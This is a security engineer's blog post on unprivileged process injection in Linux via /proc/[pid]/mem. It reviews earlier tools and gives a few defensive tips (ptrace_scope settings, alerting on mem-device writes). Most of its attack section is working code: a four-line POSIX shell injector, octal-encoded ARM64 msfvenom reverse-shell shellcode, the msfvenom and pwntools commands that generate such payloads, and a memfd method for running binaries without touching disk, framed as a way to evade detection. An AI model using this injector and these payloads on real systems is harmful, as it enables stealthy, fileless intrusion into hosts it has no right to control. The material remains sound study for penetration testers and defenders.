joev.dev - thoughts, engineering, art, life
written Aug 13 2023

I'm joev, a security engineer 👋 You may know me from my work at Apple or on Metasploit, or from my CVEs.

Nowadays I work on open-source security software. This site is a cryptographic experiment of sorts, and a place to store my photos.

Say hello: @joev@infosec.exchange

Unprivileged Process Injection Techniques in Linux

In this post I'll cover the history of process injection implementations on Linux, and share a somewhat different and simpler implementation aimed at learning and portability.

When pentesting Linux boxes, you often end up in a common situation: you have command execution as a non-root user and want to stage some native code to run on the target. There are a number of methods to accomplish this, but they can be roughly categorized into the following:

  1. Use shell commands to write the native code to a file somewhere, and exec() or LD_PRELOAD the code.
  2. Use ptrace() or /proc/PID/mem to debug a sacrificial victim process and plant your native code inside of it.

There are downsides to #1. You need a decoding routine, as shell scripts cannot contain binary data. You also need a writable location on disk, which is not always available (e.g. in read-only chroots, filesystems, containers, etc.). Finally, many intrusion detection systems look specifically for #1 and alert on it, as staging and running a native implant this way is typical malware behavior: it is straightforward and widely compatible.

This post will look at #2.

Process Injection using ptrace()

On Linux, you use the ptrace syscall to remotely control the execution of a process and read/write its memory. This is a pretty suspicious syscall to trigger in an infected process, and from a command injection entrypoint there are not many ways to invoke it (gdb being one way). Further, most Linux distros implement a sysctl called kernel/yama/ptrace_scope that controls which processes can be ptraced by an unprivileged user:

The sysctl settings (writable only with CAP_SYS_PTRACE) are:

0 - classic ptrace permissions: a process can PTRACE_ATTACH to any other
    process running under the same uid, as long as it is dumpable (i.e.
    did not transition uids, start privileged, or have called
    prctl(PR_SET_DUMPABLE...) already). Similarly, PTRACE_TRACEME is
    unchanged.

1 - restricted ptrace: a process must have a predefined relationship
    with the inferior it wants to call PTRACE_ATTACH on. By default,
    this relationship is that of only its descendants when the above
    classic criteria is also met. To change the relationship, an
    inferior can call prctl(PR_SET_PTRACER, debugger, ...) to declare
    an allowed debugger PID to call PTRACE_ATTACH on the inferior.
    Using PTRACE_TRACEME is unchanged.

2 - admin-only attach: only processes with CAP_SYS_PTRACE may use ptrace
    with PTRACE_ATTACH, or through children calling PTRACE_TRACEME.

3 - no attach: no processes may use ptrace with PTRACE_ATTACH nor via
    PTRACE_TRACEME. Once set, this sysctl value cannot be changed.

Most modern production systems set 1, "restricted ptrace", meaning non-root users can only really ptrace child processes. So a simple way to inject code would be to start a sleep child process, attach to it with exec gdb, then go to the current instruction pointer and overwrite the memory it points to with your shellcode. But again, this requires gdb on the box (usually rare) and is pretty noisy.

On defense, setting 2 is often a good recommendation to make, as it prevents any runtime debugging shenanigans without admin privs, and negates this entire class of techniques for non-root users.
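A quick way to see which of these modes a host is in is to read the sysctl through procfs. Below is a minimal sketch in Python. The helper names (`describe_ptrace_scope`, `read_ptrace_scope`) are illustrative, the labels are copied from the kernel text quoted above, and it assumes the Yama LSM exposes the value at /proc/sys/kernel/yama/ptrace_scope.

```python
from pathlib import Path
from typing import Optional

# Labels copied from the kernel documentation quoted above.
PTRACE_SCOPE_LABELS = {
    0: "classic ptrace permissions",
    1: "restricted ptrace",
    2: "admin-only attach",
    3: "no attach",
}


def describe_ptrace_scope(value: int) -> str:
    """Map a ptrace_scope value to its documented name."""
    return PTRACE_SCOPE_LABELS.get(value, "unknown")


def read_ptrace_scope(
    path: str = "/proc/sys/kernel/yama/ptrace_scope",
) -> Optional[int]:
    """Return the current setting, or None if it cannot be read or parsed."""
    try:
        return int(Path(path).read_text().strip())
    except (OSError, ValueError):
        return None


if __name__ == "__main__":
    scope = read_ptrace_scope()
    if scope is None:
        print("ptrace_scope not available (Yama may not be enabled)")
    else:
        print(f"ptrace_scope = {scope}: {describe_ptrace_scope(scope)}")
```

A value of 2 or 3 means the techniques in the rest of this post should not work for a non-root user.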

The /proc/[pid]/mem devices

On Linux systems, the procfs mount implements mem device files for all processes in the namespace, available at /proc/[pid]/mem. These devices allow using standard filesystem syscalls to manipulate remote process memory. Behind the scenes, they are more or less a clone of parts of the existing ptrace syscalls, and in fact they are subject to the same ptrace_scope sysctl and resulting permissions.

This allows us to use standard (util-linux and coreutils) commands (like dd or printf) to seek through and overwrite remote process memory via these device files, which lets us stage native code quietly, without needing a writable location on disk or relying on esoteric binaries. As such, nearly all implementations of process injection on Linux that I have seen use /proc/[pid]/mem for injection.
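To get a feel for how ordinary the file interface is, here is a harmless sketch in Python that reads a process's own memory back through /proc/self/mem using nothing but open, seek and read. The `read_own_memory` helper is a name made up for this illustration, and it returns None when the device is missing or the read is refused (as can happen in some sandboxes).

```python
import ctypes
from typing import Optional


def read_own_memory(
    address: int, length: int, mem_path: str = "/proc/self/mem"
) -> Optional[bytes]:
    """Read `length` bytes at virtual address `address` via the mem device."""
    try:
        # Unbuffered, so the seek/read map directly onto lseek()/read().
        with open(mem_path, "rb", buffering=0) as mem:
            mem.seek(address)
            return mem.read(length)
    except (OSError, ValueError, OverflowError):
        return None


if __name__ == "__main__":
    # Place a known marker in our own memory, then read it back via procfs.
    marker = ctypes.create_string_buffer(b"hello from procfs")
    print(read_own_memory(ctypes.addressof(marker), len(marker.value)))
```

The file offset is simply the virtual address, which is why a tool that can seek a file descriptor (such as dd) is all that is needed to aim a read or write.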

On defense, consider adding a weighted alert on anomalous attempts to ptrace() or open("/proc/*/mem", "w").
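As a rough illustration of the second check, the sketch below classifies an observed open() call by its path and flags. It is written in Python, and it assumes you already have some event source (auditd, eBPF, an EDR agent) that hands you the path and the open flags. The `is_proc_mem_write` name and the regex are illustrative, and how much weight a match gets is left to your alerting pipeline.

```python
import os
import re

# Matches /proc/<pid>/mem, /proc/self/mem, /proc/thread-self/mem and the
# per-thread /proc/<pid>/task/<tid>/mem variants.
PROC_MEM_RE = re.compile(r"^/proc/(\d+|self|thread-self)(/task/\d+)?/mem$")


def is_proc_mem_write(path: str, flags: int) -> bool:
    """True if an open() of `path` with `flags` is a write-capable open of a
    procfs mem device."""
    access = flags & os.O_ACCMODE
    return bool(PROC_MEM_RE.match(path)) and access in (os.O_WRONLY, os.O_RDWR)
```

Debuggers and a few profilers legitimately open these files, which is why this is better treated as one weighted signal than as a hard block.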

A brief history of /proc/[pid]/mem injections

The first time I saw this technique used was 2017, in a tool now called GDSSecurity/Cexigua, mentioned in this blog post. I will summarize it below because what the author did was brilliant, but also abject lunacy. In any case, it got the job done for them:

  1. Spawn sacrificial child process
  2. Read /proc/[pid]/maps to gather address of child process's stack
  3. kill -STOP the child
  4. Open child process's /proc/[pid]/mem device
  5. Use GNU binary grep to… dynamically search for rop gadgets and build a rop chain that stack pivots into shellcode (????)
  6. Use dd to overwrite the child's stack memory with the rop chain and shellcode
  7. kill -CONT the child

Now this is crazy cool, but as the author admits later, the ROP chain is unnecessary. It suffices to just plop some shellcode into memory and have the remote process execute it, which the author eventually realized.
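Step 2 in the list above, finding the child's stack, is just text parsing. Here is a minimal sketch in Python of what that lookup amounts to; it is not the tool's actual code (which is shell), and `find_stack_range` and the sample data are made up for illustration.

```python
from typing import Optional, Tuple


def find_stack_range(maps_text: str) -> Optional[Tuple[int, int]]:
    """Return (start, end) of the [stack] mapping from /proc/[pid]/maps text."""
    for line in maps_text.splitlines():
        # Fields: address-range perms offset dev inode [pathname]
        fields = line.split()
        if len(fields) >= 6 and fields[5] == "[stack]":
            start, end = fields[0].split("-")
            return int(start, 16), int(end, 16)
    return None


# Hypothetical excerpt of a maps file, for illustration only.
SAMPLE_MAPS = """\
55d0c1a00000-55d0c1a21000 r-xp 00000000 08:01 1311  /usr/bin/sleep
7ffc1a2b3000-7ffc1a2d4000 rw-p 00000000 00:00 0     [stack]
"""

if __name__ == "__main__":
    start, end = find_stack_range(SAMPLE_MAPS)
    print(hex(start), hex(end))
```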

If you are wondering "why can you overwrite a process's executable memory without first changing the memory's protection flags?": basically, the Linux kernel helpfully bypasses page write protections for ptrace-style writes (including writes through /proc/[pid]/mem), for developer convenience. A good explanation of how this is achieved amidst things like hardware-based memory protections can be found here.

In 2018, rb from Sektor7 wrote a comprehensive article on use of ptrace and /proc/*/mem techniques for in-memory shellcode injection on Linux. I highly recommend reading this as a starting point, as it provides a simple (but version/offset-dependent) injection script example at the end.

Following this, a number of tools were developed with similar, evolving techniques for Linux process injection. DavidBuchanan314/dlinject is a more straightforward implementation, but requires python on the target. arget13/DDexec improves on this by using /bin/sh instead of python, and by researching and documenting how to avoid command dependencies. DDexec works by overwriting /proc/self/mem in a forked shell process, which is sort of like a process performing brain surgery on itself 🤯. Recently the same dlinject author wrote DavidBuchanan314/stelf-loader, which builds on this approach with an extremely interesting implementation: it lets you provide an ELF input instead of shellcode and handles transparently loading it into memory for you.

On offense, writing tools that run on all the Linux distros (and modern containers) is an art in itself. The best advice IMHO for writing tools that live forever is: know the POSIX shell spec, and try to avoid exec()ing other commands. When you must, only rely on broad packages: util-linux and coreutils are good starting points.

Rolling our own simple implementation

After reviewing the state of the art here, I like to use a much dumber approach: one that requires very little effort to implement but retains wide compatibility across Linux environments. It just does this:

  1. From a shell, open a write fd to /proc/self/mem
  2. Read /proc/self/syscall to find the return address of the read() syscall
  3. In a child subshell, seek the fd to this address using dd skip=..., then write your shellcode payload
  4. The parent process will then read() from the child process, triggering the payload

This is written to only require dd (part of coreutils) and absolutely nothing else. It can be pulled together in 4 lines of portable POSIX shell script. Here you go:

PAYLOAD='\002\000\240\343\001\020\240\343\005\040\201\342\214\160'\
'\240\343\215\160\207\342\000\000\000\357\000\140\240\341\140\020'\
'\217\342\020\040\240\343\215\160\240\343\216\160\207\342\000\000'\
'\000\357\006\000\240\341\000\020\240\343\077\160\240\343\000\000'\
'\000\357\006\000\240\341\001\020\240\343\077\160\240\343\000\000'\
'\000\357\006\000\240\341\002\020\240\343\077\160\240\343\000\000'\
'\000\357\044\000\217\342\004\100\044\340\020\000\055\351\015\040'\
'\240\341\044\100\217\342\020\000\055\351\015\020\240\341\013\160'\
'\240\343\000\000\000\357\002\000\025\263\177\000\000\001\057\142'\
'\151\156\057\163\150\000\000\000\000\000\000\000\000\000\163\150'\
'\000\000\000\000\000\000\000\000\000\000\000\000\000\000'
(
exec 5>/proc/self/mem 
read -r _ _ _ _ _ _ _ _ ADDR </proc/self/syscall
( dd count=0 bs=1 skip=$((ADDR)) <&5; printf "${PAYLOAD}" >&5 )
) &
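The `read -r _ _ _ _ _ _ _ _ ADDR` line works because, while a process is blocked in a syscall, /proc/[pid]/syscall is a single line of nine fields: the syscall number, six argument registers, the stack pointer and the program counter. The Python sketch below does the same field selection on a made-up sample line; `syscall_return_address` is an illustrative name and the sample values are not from a real process.

```python
from typing import Optional


def syscall_return_address(line: str) -> Optional[int]:
    """Return the program counter (9th field) from a /proc/[pid]/syscall line,
    or None if the process is not blocked inside a syscall."""
    fields = line.split()
    # Other shapes ("running", or "-1 SP PC" when blocked outside a syscall)
    # do not carry nine fields, so they are rejected here.
    if len(fields) != 9:
        return None
    return int(fields[8], 16)


# Hypothetical line: syscall 0 with six args, then SP, then PC.
SAMPLE = "0 0x3 0x55e0b7d2a4a0 0x1000 0x0 0x0 0x0 0x7ffd3c8b1a58 0x7f6e2c114992"

if __name__ == "__main__":
    print(hex(syscall_return_address(SAMPLE)))
```

The shell version relies on `$((ADDR))` to turn the `0x`-prefixed hex string into the decimal offset that dd expects.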

Pro tip: On offense, use printf with \000 octal for decoding embedded binary data within a shell script; it's the only binary decoding routine guaranteed by the POSIX sh spec.

The shellcode above is for the ARM64 architecture, generated by metasploit and encoded into octal; it connects a TCP reverse shell over to a listener on 127.0.0.1:5555. Here is how I generated it (use aarch64 for ARM64 and x64 for X86_64):

$ docker run -it metasploitframework/metasploit-framework bash
> ./msfvenom -p linux/aarch64/shell_reverse_tcp lhost=127.0.0.1 lport=5555 -f raw | \
    ruby -e 'STDIN.read.bytes.each { |b| printf "\\%03o", b }'
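The Ruby one-liner above emits one three-digit octal escape per byte. Before pasting a long PAYLOAD string into a script, it can be worth decoding it back to bytes to check that nothing was mangled. Here is a small Python sketch of that check; `decode_printf_octal` is a made-up helper that only understands the three-digit `\NNN` form used in this post.

```python
import re


def decode_printf_octal(escaped: str) -> bytes:
    """Decode a string of three-digit octal escapes (\\000 to \\377) to bytes.

    Anything that is not a three-digit octal escape is ignored, so quotes and
    line continuations in a pasted PAYLOAD assignment do not get in the way.
    """
    return bytes(int(m, 8) for m in re.findall(r"\\([0-3][0-7]{2})", escaped))


if __name__ == "__main__":
    # First four bytes of the payload shown earlier in this post.
    print(decode_printf_octal(r"\002\000\240\343").hex())
```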

Of course a reverse shell payload is not practical at all; we already have command execution in this situation. The much more useful thing to do is to create a memory-backed fd that we can then write an arbitrary ELF executable to and execute. So we'll tweak the shellcode payload a bit to do this. You can use metasm_shell.rb to do this in metasploit, but pwntools makes things a bit easier IMO, as it is architecture-agnostic. We'll have the shellcode call memfd_create, then send itself a SIGSTOP so we can use the memfd from our original shell:

$ docker run --platform linux/amd64 -it pwntools/pwntools
pwntools@d7869fd2a307:/$ python
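>>> from pwn import *
>>> context.arch = 'arm64'
>>> # memfd_create("", 0), then kill(0, 19): signal 19 is SIGSTOP
>>> sc = asm(shellcraft.memfd_create("", 0)) + asm(shellcraft.kill(0, 19))
>>> # encode every byte as a three-digit octal escape for printf
>>> output = "".join("\\%03o" % b for b in sc)
>>> print("PAYLOAD='%s'" % output)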

Which yields:

PAYLOAD='\356\003\037\252\356\017\037\370\340\003\000\221\341\003\037'\
'\252\350\042\200\322\001\000\000\324\340\003\037\252\141\002\200\322'\
'\050\020\200\322\001\000\000\324'

After executing the above shellcode, we can find the writable memfd handle number by consulting the child process:

$ CHILD=$!
$ ls -al /proc/$CHILD/fd/
total 0
dr-x------    2 msf      msf              0 Aug 29 20:45 .
dr-xr-xr-x    9 msf      msf              0 Aug 29 20:44 ..
lrwx------    1 msf      msf             64 Aug 29 20:45 0 -> /dev/pts/0
lrwx------    1 msf      msf             64 Aug 29 20:45 1 -> /dev/pts/0
lrwx------    1 msf      msf             64 Aug 29 20:45 2 -> /dev/pts/0
lrwx------    1 msf      msf             64 Aug 29 20:45 255 -> /dev/pts/0
lrwx------    1 msf      msf             64 Aug 29 20:45 3 -> /memfd: (deleted)
l-wx------    1 msf      msf             64 Aug 29 20:45 5 -> /proc/123/mem
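Picking the memfd out of that listing by eye is easy, but it can also be scripted: each entry under /proc/[pid]/fd is a symlink, and memfd targets start with `/memfd:`. Below is a minimal Python sketch of that lookup. `find_memfds` and `demo` are illustrative names, and `demo` builds a fake fd directory mirroring the listing above rather than touching a real process.

```python
import os
import tempfile
from typing import List


def find_memfds(fd_dir: str) -> List[int]:
    """Return the fd numbers under `fd_dir` whose link target is a memfd."""
    found = []
    for name in os.listdir(fd_dir):
        if not name.isdigit():
            continue
        try:
            target = os.readlink(os.path.join(fd_dir, name))
        except OSError:
            continue  # fd was closed between listdir() and readlink()
        if target.startswith("/memfd:"):
            found.append(int(name))
    return sorted(found)


def demo() -> List[int]:
    """Scan a fake fd directory shaped like the listing above."""
    with tempfile.TemporaryDirectory() as fake_fd_dir:
        os.symlink("/dev/pts/0", os.path.join(fake_fd_dir, "0"))
        os.symlink("/memfd: (deleted)", os.path.join(fake_fd_dir, "3"))
        os.symlink("/proc/123/mem", os.path.join(fake_fd_dir, "5"))
        return find_memfds(fake_fd_dir)


if __name__ == "__main__":
    print(demo())
```

Against a real child you would call it as `find_memfds(f"/proc/{child_pid}/fd")`, where `child_pid` is the PID captured in `$CHILD`.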

We can then just use a series of printf statements to write our ELF executable to the memfd on fd#3, and execute it like normal.

$ printf '...' >> /proc/$CHILD/fd/3
$ /proc/$CHILD/fd/3 &
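The `'...'` above stands for the octal-encoded ELF. For anything larger than a toy binary you will want to split it across several printf statements, so that no single command line gets too long. Here is one way to generate them, sketched in Python on the operator side; `printf_lines` and the 64-byte chunk size are arbitrary choices for illustration.

```python
from typing import Iterator


def printf_lines(data: bytes, target: str, chunk_size: int = 64) -> Iterator[str]:
    """Yield shell lines that append `data` to `target`, one chunk per printf.

    Every byte is octal-escaped, so the format string never contains a bare
    '%' or quote character that printf or the shell could misinterpret.
    """
    for offset in range(0, len(data), chunk_size):
        chunk = data[offset:offset + chunk_size]
        escaped = "".join("\\%03o" % b for b in chunk)
        yield "printf '%s' >> %s" % (escaped, target)


if __name__ == "__main__":
    # The ELF magic bytes stand in for a real executable here.
    for line in printf_lines(b"\x7fELF", "/proc/$CHILD/fd/3", chunk_size=2):
        print(line)
```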

And that is one way to run executables on Linux without ever touching disk. This approach should work on all distributions of Linux, provided kernel/yama/ptrace_scope is set to 1 or lower and the dd binary is available. If by some chance dd is missing (dd is part of coreutils, but you never know), see DDexec for a list of alternative common Linux commands that will seek a file descriptor to a desired offset.